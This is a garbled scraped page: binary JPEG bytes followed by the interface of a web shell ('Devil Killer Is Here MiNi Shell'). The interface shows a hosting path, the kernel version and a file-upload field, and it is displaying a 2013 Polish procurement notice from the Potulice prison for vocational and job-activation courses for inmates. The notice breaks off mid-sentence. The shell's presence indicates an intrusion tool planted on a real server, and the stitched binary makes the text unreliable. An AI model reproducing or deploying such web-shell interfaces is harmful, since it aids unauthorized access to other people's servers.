JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130219/70752-N-2013.html

<p class="kh_header"><b>Potulice: Cykl szkoleń dla osadzonych (znak sprawy 4/2013)</b><br>
<b>Numer ogłoszenia: 70752 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , Aleja Parkowa 1, 89-120 Potulice, woj. kujawsko-pomorskie, tel. 052 5874440, faks 052 5874400.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Cykl szkoleń dla osadzonych (znak sprawy 4/2013).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Grupa 1 - malarz - szpachlarz
1)    Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu  w roku 2013 szkolenia zawodowego dla skazanych w ramach projektu Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską  w ramach Europejskiego Funduszu Społecznego.
2)    Usługa szkolenia zawodowego osadzonych zostanie realizowana  w Zakładzie Karnym w Potulicach, jako kurs malarz-szpachlarz, zgodnie z wymaganiami określonymi w niniejszej siwz. CPV: 80530000-8.
3)      Ilość kursów: 2.
4)       lość osób do przeszkolenia: 24, po 12 osób na kurs .
5)    Usługa szkolenia zawodowego zostanie przeprowadzona do końca sierpnia 2013 r. w terminie określonym przez Zamawiającego.
6)     Celem szkolenia jest przygotowanie do pracy na stanowisku malarz-szpachlarz oraz zdobycie przez jego uczestników odpowiednich uprawnień zawodowych w tym zakresie.
7)   Zajęcia teoretyczne i praktyczne szkolenia odbywać się będą w siedzibie Zamawiającego, w dni robocze, od poniedziałku do piątku, w wymiarze nie większym niż 8 godzin dziennie.
8)   Szkolenie trwa 100 godzin lekcyjnych (1 godz. = 45 min.), w tym zajęć teoretycznych: 20 godzin.
9)   Zagadnienia dotyczące szkolenia: BHP; materiałoznawstwo; rysunek zawodowy; technologia z elementami maszynoznawstwa; zajęcia praktyczne (nabycie umiejętności malarsko-szpachlarskich).
10)  Przed rozpoczęciem kursu wykonawca zapewnia wszystkim uczestnikom szkolenia (wraz z osobami rezerwowymi) wszelkie badania lekarskie uprawniające kursantów do uczestnictwa w kursie, spełniające wymagania badań zawodowych na stanowisko malarza-szpachlarza, przeprowadzenie badań lekarskich odbędzie się w siedzibie Zamawiającego.
11) Przed rozpoczęciem szkolenia, wykonawca zapoznaje uczestnika ze szczegółowym programem szkolenia oraz przedstawia im harmonogram realizowanych zajęć.
12)  Wykonawca ubezpiecza uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem.
13)  Wykonawca zapewnia uczestnikom szkolenia wszelkie materiały i sprzęt niezbędny do przeprowadzenia niniejszego szkolenia, w tym artykuły biurowe oraz odzież i obuwie ochronne dla każdego uczestnika (wartość materiałów użytych w procesie szkolenia nie może przekroczyć 40% wartości szkolenia).
14)  Wykonawca zapewnia kadrę dydaktyczną o odpowiednich kwalifikacjach do prowadzenia niniejszego szkolenia zawodowego.
15)  Wykonawca przed rozpoczęciem realizacji szkolenia przedstawia program szkolenia zawodowego, sporządzony zgodnie z Rozporządzeniem Ministra Sprawiedliwości w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych z dnia 13 lutego 2004r. (Dz. U. Nr 37, poz. 337) oraz Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia na rynku pracy (Dz. U. Nr 47, poz. 315) zawierający                w szczególności: nazwę i zakres szkolenia; czas trwania i sposób organizacji szkolenia; wymagania wstępne dla uczestników szkolenia; cele szkolenia; plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej; treści szkolenia w zakresie poszczególnych zajęć edukacyjnych; wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych; sposób sprawdzania efektów szkolenia; dobranie poziomu wiedzy i doświadczenia wykładowców do tematyki szkolenia; przeprowadzenie kursu zgodnie z ustaloną liczbą godzin, bez względu na ewentualne przerwy (choroby wykładowców, święta, dni wolne, awarie itp.); prowadzenie dokumentacji przebiegu szkolenia tj. m.in.: dziennika zajęć edukacyjnych zawierającego listę obecności, wymiar godzin i tematy zajęć edukacyjnych; programu nauczania, protokołu z egzaminu (jeżeli został przeprowadzony); rejestru wydawanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji; ankiet oceny szkolenia i wykładowcy dla uczestników i absolwentów szkolenia, dodatkową listę obecności podpisywaną przez poszczególnych uczestników kursu.  
16)  Wykonawca przeprowadza wśród uczestników szkolenia ocenę merytorycznego i technicznego przebiegu szkolenia m.in. na podstawie formularza ankiety oceniającej. 
17)  W przypadku zajęć praktycznych, wykonawca przed rozpoczęciem realizacji szkolenia wyszczególnia na piśmie sprzęt, urządzenia i ich ilości, jakie będą wykorzystywane podczas zajęć.
18)  Wykonawca odpowiada za przeszkolenie kursantów w zakresie BHP oraz za przestrzeganie warunków BHP w trakcie całego szkolenia.
19)  Szkolenie kończy się oceną nabytych umiejętności i wydaniem zaświadczeń o jego ukończeniu, zgodnie z rozporządzeniem MEN oraz MPiPS z dnia 12.10.1993r. w sprawie zasad i warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych (Dz. U. Nr 103, poz. 472             z późn. zmianami) oraz rozporządzeniem MEN z dnia 11.01 2012r. (Dz. U. Nr 34 poz. 186 z 2012r) w sprawie kształcenia ustawicznego w formach pozaszkolnych oraz certyfikatu w zakresie zdobytych uprawnień. Oryginały          ww dokumentów i ich kserokopie mają być potwierdzone za zgodność                  z oryginałem i przekazane do Zakładu Karnego w Potulicach.
20)  Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia oraz              za należytą staranność przy realizacji zobowiązań umowy.
21) Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania zamówienia.
22)  Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem Wykonawcy.
23)   Wykonawca określa numery telefonów kontaktowych i faksu oraz innych danych niezbędnych dla sprawnego i terminowego wykonania zamówienia.
24)   Należność za usługę szkolenia zawodowego zostanie uregulowana przelewem, w terminie 30 dni, od daty otrzymania faktury przez zamawiającego za przeprowadzenie kursu.
25)   Niniejsza część postępowania dotycząca grupy 1 może zostać unieważniona na podstawie art. 93 ust. 1a ustawy Pzp.

2. Grupa 2 - zajęcia aktywizacyjne 
	 1)   Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu              w roku 2013r. Szkolenia aktywizacyjnego dla skazanych w związku z realizacją projektu Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
	2)	Usługa szkolenia aktywizacyjnego osadzonych zostanie realizowana              w Zakładzie Karnym w Potulicach, zgodnie z wymaganiami określonymi               w niniejszej siwz. CPV: 80500000-9.
	3)	ilość kursów: 2
4) ilość osób do przeszkolenia: 24, po 12 osób na kurs.  
5)	Usługi szkolenia aktywizacyjnego zostaną przeprowadzone do końca sierpnia 2013 r. w terminach określonych przez Zamawiającego.
6) Celem szkolenia jest nabycie przez beneficjentów podstawowych zagadnień związanych ze skutecznym radzeniem sobie na rynku pracy - zagadnienia: autoprezentacja; komunikacja z pracodawcą; rozmowa kwalifikacyjna; dokumenty aplikacyjne; sposoby poszukiwania pracy; poznawanie i odkrywanie swoich umiejętności i predyspozycji zawodowych.
7) Szkolenia odbywać się będą w siedzibie Zamawiającego, w dni robocze, 
od poniedziałku do piątku, w wymiarze nie większym niż 8 godzin dziennie.
8)  Szkolenie trwa 20 godzin lekcyjnych (1 godz. = 45 min.).
9) Wykonawca zapewnia kadrę dydaktyczną o kwalifikacjach odpowiednich do prowadzenia zajęć psychokorekcyjnych oraz doradztwa zawodowego.
10)Przed rozpoczęciem szkolenia, wykonawca informuje beneficjentów ostatecznych o tym, że szkolenie jest współfinansowane z przez Unię Europejską - Europejski Fundusz Społeczny w ramach Programu Operacyjnego Kapitał Ludzki, oraz zapoznaje uczestników z szczegółowym programem szkolenia oraz przedstawia im harmonogram realizowanych zajęć.
11)Wykonawca ubezpiecza uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem.
12) Wykonawca zapewnia uczestnikom szkolenia wszelkie materiały i sprzęt niezbędny do przeprowadzenia szkolenia aktywizacyjnego, a Zamawiający         we własnym zakresie dostarczy sprzęt multimedialny.
13) Wykonawca przed rozpoczęciem realizacji szkolenia przedstawia program szkolenia, sporządzony zgodnie z Rozporządzeniem Ministra Sprawiedliwości w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych z dnia 13 lutego 2004r. (Dz. U. Nr 37, poz. 337) oraz Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia na rynku pracy (Dz. U. Nr 47, poz. 315) zawierający  w szczególności: nazwę i zakres szkolenia; czas trwania i sposób organizacji szkolenia; wymagania wstępne dla uczestników szkolenia; cele szkolenia; plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar,                         z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej; treści szkolenia w zakresie poszczególnych zajęć edukacyjnych; wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych; sposób sprawdzania efektów szkolenia; dobranie poziomu wiedzy i doświadczenia wykładowców do tematyki szkolenia; przeprowadzenie kursu zgodnie                      z ustaloną liczbą godzin, bez względu na ewentualne przerwy (choroby wykładowców, święta, dni wolne, awarie itp.); prowadzenie dokumentacji przebiegu szkolenia tj. m.in.: dziennika zajęć edukacyjnych, programu nauczania, wymiar godzin i tematy zajęć edukacyjnych, protokołu z egzaminu (jeżeli został przeprowadzony), rejestru wydawanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji, ankiet oceny szkolenia i wykładowcy dla uczestników i absolwentów szkolenia, listę obecności podpisywaną przez poszczególnych beneficjentów ostatecznych   i wykładowcy. Lista obecności powinna być podpisana kolorem niebieskim  lub zielonym.
14)Wykonawca przeprowadza wśród uczestników szkolenia ocenę merytorycznego i technicznego przebiegu szkolenia m.in. na podstawie formularza ankiety oceniającej. 
15) W przypadku zajęć praktycznych, wykonawca przed rozpoczęciem realizacji szkolenia wyszczególnia na piśmie sprzęt i urządzenia oraz ich ilości, jakie będą wykorzystywane podczas zajęć.
16)   Wykonawca odpowiada za przestrzeganie warunków i przepisów BHP w trakcie całego szkolenia.
17) Szkolenie kończy się oceną nabytych umiejętności i wydaniem zaświadczeń o jego ukończeniu, zgodnie z rozporządzeniem MEN oraz MPiPS z dnia 12.10.1993r. w sprawie zasad i warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych (Dz. U. Nr 103, poz. 472  z późn. zmianami) oraz rozporządzeniem MEN z dnia 11.01 2012r. (Dz. U. Nr 34, poz. 186 z 2012r) w sprawie kształcenia ustawicznego w formach pozaszkolnych oraz certyfikatu w zakresie zdobytych uprawnień. Oryginały w/w dokumentów i ich kserokopie potwierdzone za zgodność z oryginałem mają być przekazane do Zakładu Karnego w Potulicach.
18) Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia oraz               za należytą staranność przy realizacji zobowiązań umowy.
19) Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania zamówienia.
20)  Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem Wykonawcy.
21) Wykonawca określa numery telefonów kontaktowych i faksu oraz innych danych niezbędnych dla sprawnego i terminowego wykonania zamówienia.
22) Należność za usługi szkolenia aktywizacyjnego zostanie uregulowana przelewem, w terminie 30 dni, od daty otrzymania faktury przez zamawiającego za przeprowadzenie kursu.
23) Niniejsza część postępowania dotycząca grupy 2 może zostać unieważniona na podstawie art. 93 ust. 1a ustawy Pzp.


3. Grupa 3 - palacz c.o.
1)	Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu w roku 2013 szkolenia zawodowego dla skazanych w związku z realizacją projektu Aktywizacja społeczno zawodowa skazanych niepełnosprawnych oraz osób skazanych na karę pozbawienia wolności na podstawie art. 209 §1 lub art. 207 §1 Kodeksu karnegow ramach Programu Operacyjnego Kapitał Ludzki współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
2)	Usługa szkolenia zawodowego osadzonych zostanie realizowana w Zakładzie Karnym w Potulicach, jako kurs przyuczający do zawodu palacz centralnego ogrzewania, zgodnie z wymaganiami określonymi w niniejszej siwz. CPV: 80530000-8.
3)	Ilość kursów: 1.
4)	Ilość osób do przeszkolenia: 8.
5)	Usługa szkolenia zawodowego zostanie przeprowadzona do dnia 31 sierpnia  2013 r. w terminie określonym przez Zamawiającego.
6)	Celem szkolenia jest przygotowanie osadzonych do pracy na stanowisku palacza c.o. oraz zdobycie przez jego uczestników odpowiednich uprawnień zawodowych w zakresie eksploatacji kotłów centralnego ogrzewania opalanych różnymi paliwami, potwierdzone wydaniem książeczki palacza lub odpowiednim wpisem w posiadanej już książeczce, a także wydaniem odpowiedniego certyfikatu w zakresie zdobytych uprawnień.
7)	Zajęcia teoretyczne i praktyczne szkolenia odbywać się będą w siedzibie Zamawiającego, w dni robocze, od poniedziałku do piątku, w wymiarze nie większym niż 8 godzin dziennie. W zakresie zajęć praktycznych zamawiający zapewni dostęp do kotłowni na terenie Zakładu Karnego.
8)	Szkolenie trwa 40 godzin lekcyjnych (1 godz. = 45 min.).
9)	Zakres (zagadnienia dotyczące) szkolenia: budowa, rodzaje i zasady działania kotłów i innego sprzętu wykorzystywanego w kotłowni; przepisy z zakresu gospodarki paliwowo-energetycznej; rodzaje paliw, parametry techniczne paliw i ich wykorzystanie; proces spalania paliw; aparatura kontrolno-pomiarowa i zabezpieczenie kotłów zgodnie z BHP i PN; instalacje centralnego ogrzewania; przepisy BHP i ppoż.
10)	Przed rozpoczęciem kursu wykonawca zapewnia wszystkim uczestnikom szkolenia (wraz z osobami rezerwowymi) wszelkie badania lekarskie uprawniające do uczestnictwa w kursie, spełniające wymagania badań zawodowych na stanowisko palacza c.o. Przeprowadzenie badań lekarskich odbędzie się w siedzibie Zamawiającego.
11)	Przed rozpoczęciem szkolenia, wykonawca informuje beneficjentów ostatecznych o tym, że szkolenie jest współfinansowane z przez Unię Europejską - Europejski Fundusz Społeczny w ramach Programu Operacyjnego Kapitał Ludzki, oraz zapoznaje uczestników z szczegółowym programem szkolenia oraz przedstawia im harmonogram realizowanych zajęć.
12)	Wykonawca ubezpiecza uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem.
13)	Wykonawca zapewnia uczestnikom szkolenia wszelkie materiały i sprzęt niezbędny do przeprowadzenia niniejszego szkolenia, w tym artykuły biurowe oraz odzież ochronną dla każdego uczestnika (wartość materiałów użytych w procesie szkolenia nie może przekroczyć 40% wartości szkolenia).
14)	Wykonawca zapewnia kadrę dydaktyczną o odpowiednich kwalifikacjach do prowadzenia niniejszego szkolenia zawodowego.
15)	Wykonawca przed rozpoczęciem realizacji szkolenia przedstawia program szkolenia zawodowego, sporządzony zgodnie z Rozporządzeniem Ministra Sprawiedliwości w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych z dnia 13 lutego 2004r. (Dz. U. Nr 37, poz. 337) oraz Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia na rynku pracy (Dz. U. Nr 47, poz. 315) zawierający w szczególności: nazwę i zakres szkolenia; czas trwania i sposób organizacji szkolenia; wymagania wstępne dla uczestników szkolenia; cele szkolenia; plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej; treści szkolenia w zakresie poszczególnych zajęć edukacyjnych; wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych; sposób sprawdzania efektów szkolenia; dobranie poziomu wiedzy i doświadczenia wykładowców do tematyki szkolenia; przeprowadzenie kursu zgodnie z ustaloną liczbą godzin, bez względu na ewentualne przerwy (choroby wykładowców, święta, dni wolne, awarie itp.); prowadzenie dokumentacji przebiegu szkolenia tj. m.in.: dziennika zajęć edukacyjnych zawierającego listę obecności, wymiar godzin i tematy zajęć edukacyjnych; protokołu z egzaminu (jeżeli został przeprowadzony); rejestru wydawanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji; ankiet oceny szkolenia i wykładowcy dla uczestników i absolwentów szkolenia, listę obecności podpisywaną przez poszczególnych beneficjentów ostatecznych. Lista obecności powinna być podpisana kolorem niebieskim lub zielonym.
16)	Wykonawca przeprowadza wśród uczestników szkolenia ocenę merytorycznego i technicznego przebiegu szkolenia m.in. na podstawie formularza ankiety oceniającej.
17)	W przypadku zajęć praktycznych, wykonawca przed rozpoczęciem realizacji szkolenia wyszczególnia na piśmie sprzęt, urządzenia i ich ilości, jakie będą wykorzystywane podczas zajęć.
18)	Wykonawca odpowiada za przeszkolenie kursantów w zakresie BHP oraz za przestrzeganie warunków BHP w trakcie całego szkolenia.
19)	Szkolenie kończy się egzaminem i wydaniem zaświadczenia potwierdzającego zakres przeszkolenia lub książeczki palacza c. o. albo odpowiedniego wpisu w posiadanej już książeczce i wydaniem odpowiedniego świadectwa kwalifikacji zawodowych.
20)	Szkolenie kończy się oceną nabytych umiejętności i wydaniem zaświadczeń o jego ukończeniu, zgodnie z rozporządzeniem MEN oraz MPiPS z dnia 12.10.1993r. w sprawie zasad i warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych (Dz. U. Nr 103, poz. 472 z późn. zmianami) oraz rozporządzeniem MEN z dnia 11.01.2012 r. (Dz.U. Nr 34 poz. 186 z 2012 r.) w sprawie kształcenia ustawicznego w formach pozaszkolnych oraz certyfikatu w zakresie zdobytych uprawnień. Oryginały w/w dokumentów i ich kserokopie potwierdzone za zgodność z oryginałem mają być przekazane do Zakładu Karnego w Potulicach.
21)	Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia oraz za należytą staranność przy realizacji zobowiązań umowy.
22)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania zamówienia.
23)	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem Wykonawcy.
24)	Wykonawca określa numery telefonów kontaktowych i faksu oraz innych danych niezbędnych dla sprawnego i terminowego wykonania zamówienia.
25)	Należność za usługę szkolenia zawodowego zostanie uregulowana przelewem, w terminie 30 dni, od daty otrzymania faktury przez zamawiającego za przeprowadzenie kursu.
26)	Niniejsza część postępowania dotycząca grupy 3 może zostać unieważniona na podstawie art. 93 ust. 1a ustawy Pzp.

4. Grupa 4 - ogrodnik terenów zielonych 
1)	Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu w roku 2013 szkolenia zawodowego dla skazanych w ramach projektu Aktywizacja społeczno zawodowa skazanych niepełnosprawnych oraz osób skazanych na karę pozbawienia wolności na podstawie art. 209 §1 lub art. 207 §1 Kodeksu karnego w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską  w ramach Europejskiego Funduszu Społecznego.
2)	Usługa szkolenia zawodowego osadzonych zostanie realizowana              w Zakładzie Karnym w Potulicach, jako kurs ogrodnik terenów zielonych, zgodnie z wymaganiami określonymi w niniejszej siwz. CPV: 80530000-8.
3)	Ilość kursów: 1.
4)	Ilość osób do przeszkolenia: 8
5)	 Usługa szkolenia zawodowego zostanie przeprowadzona do końca sierpnia 2013 r. w terminie określonym przez Zamawiającego.
6)	Celem szkolenia jest nabycie przez kursantów umiejętności do wykonywania zawodu ogrodnik terenów zielonych oraz zdobycie przez nich odpowiednich uprawnień zawodowych w tym zakresie. 
7)	Zajęcia teoretyczne i praktyczne szkolenia odbywać się będą w siedzibie Zamawiającego, w dni robocze, od poniedziałku do piątku, w wymiarze nie większym niż 8 godzin dziennie.
8)	Szkolenie trwa 100 godzin lekcyjnych (1 godz. = 45 min.). 
9)	Zagadnienia dotyczące szkolenia: BHP; zasady pracy na stanowisku ogrodnik terenów zielonych, rodzaje czynności wykonywanych na w/w stanowisku; podział i budowa roślin; zasady projektowania i kompozycji, cięcie krzewów ozdobnych; zabiegi pielęgnacyjne i ochrona roślin; zakładanie trawników. 
10)	Przed rozpoczęciem kursu wykonawca zapewnia wszystkim uczestnikom szkolenia (wraz z osobami rezerwowymi) wszelkie badania lekarskie uprawniające kursantów do uczestnictwa w kursie, spełniające wymagania badań zawodowych na stanowisko ogrodnik terenów zielonych, przeprowadzenie badań lekarskich odbędzie się w siedzibie Zamawiającego.
11)	Przed rozpoczęciem szkolenia, wykonawca zapoznaje uczestników            ze szczegółowym programem szkolenia oraz przedstawia im harmonogram realizowanych zajęć.
12)	Wykonawca ubezpiecza uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem.
13)	Wykonawca zapewnia uczestnikom szkolenia wszelkie materiały i sprzęt niezbędny do przeprowadzenia niniejszego szkolenia, w tym artykuły biurowe oraz odzież i obuwie ochronne dla każdego uczestnika (wartość materiałów użytych w procesie szkolenia nie może przekroczyć 40% wartości szkolenia).
14)	Wykonawca zapewnia kadrę dydaktyczną o odpowiednich kwalifikacjach do prowadzenia niniejszego szkolenia zawodowego.
15)	Wykonawca przed rozpoczęciem realizacji szkolenia przedstawia program szkolenia zawodowego, sporządzony zgodnie z Rozporządzeniem Ministra Sprawiedliwości w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych z dnia 13 lutego 2004r. (Dz. U. Nr 37, poz. 337) oraz Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia na rynku pracy (Dz. U. Nr 47, poz. 315) zawierający  w szczególności: nazwę i zakres szkolenia; czas trwania i sposób organizacji szkolenia; wymagania wstępne dla uczestników szkolenia; cele szkolenia; plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej; treści szkolenia w zakresie poszczególnych zajęć edukacyjnych; wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych; sposób sprawdzania efektów szkolenia; dobranie poziomu wiedzy i doświadczenia wykładowców do tematyki szkolenia; przeprowadzenie kursu zgodnie z ustaloną liczbą godzin, bez względu na ewentualne przerwy (choroby 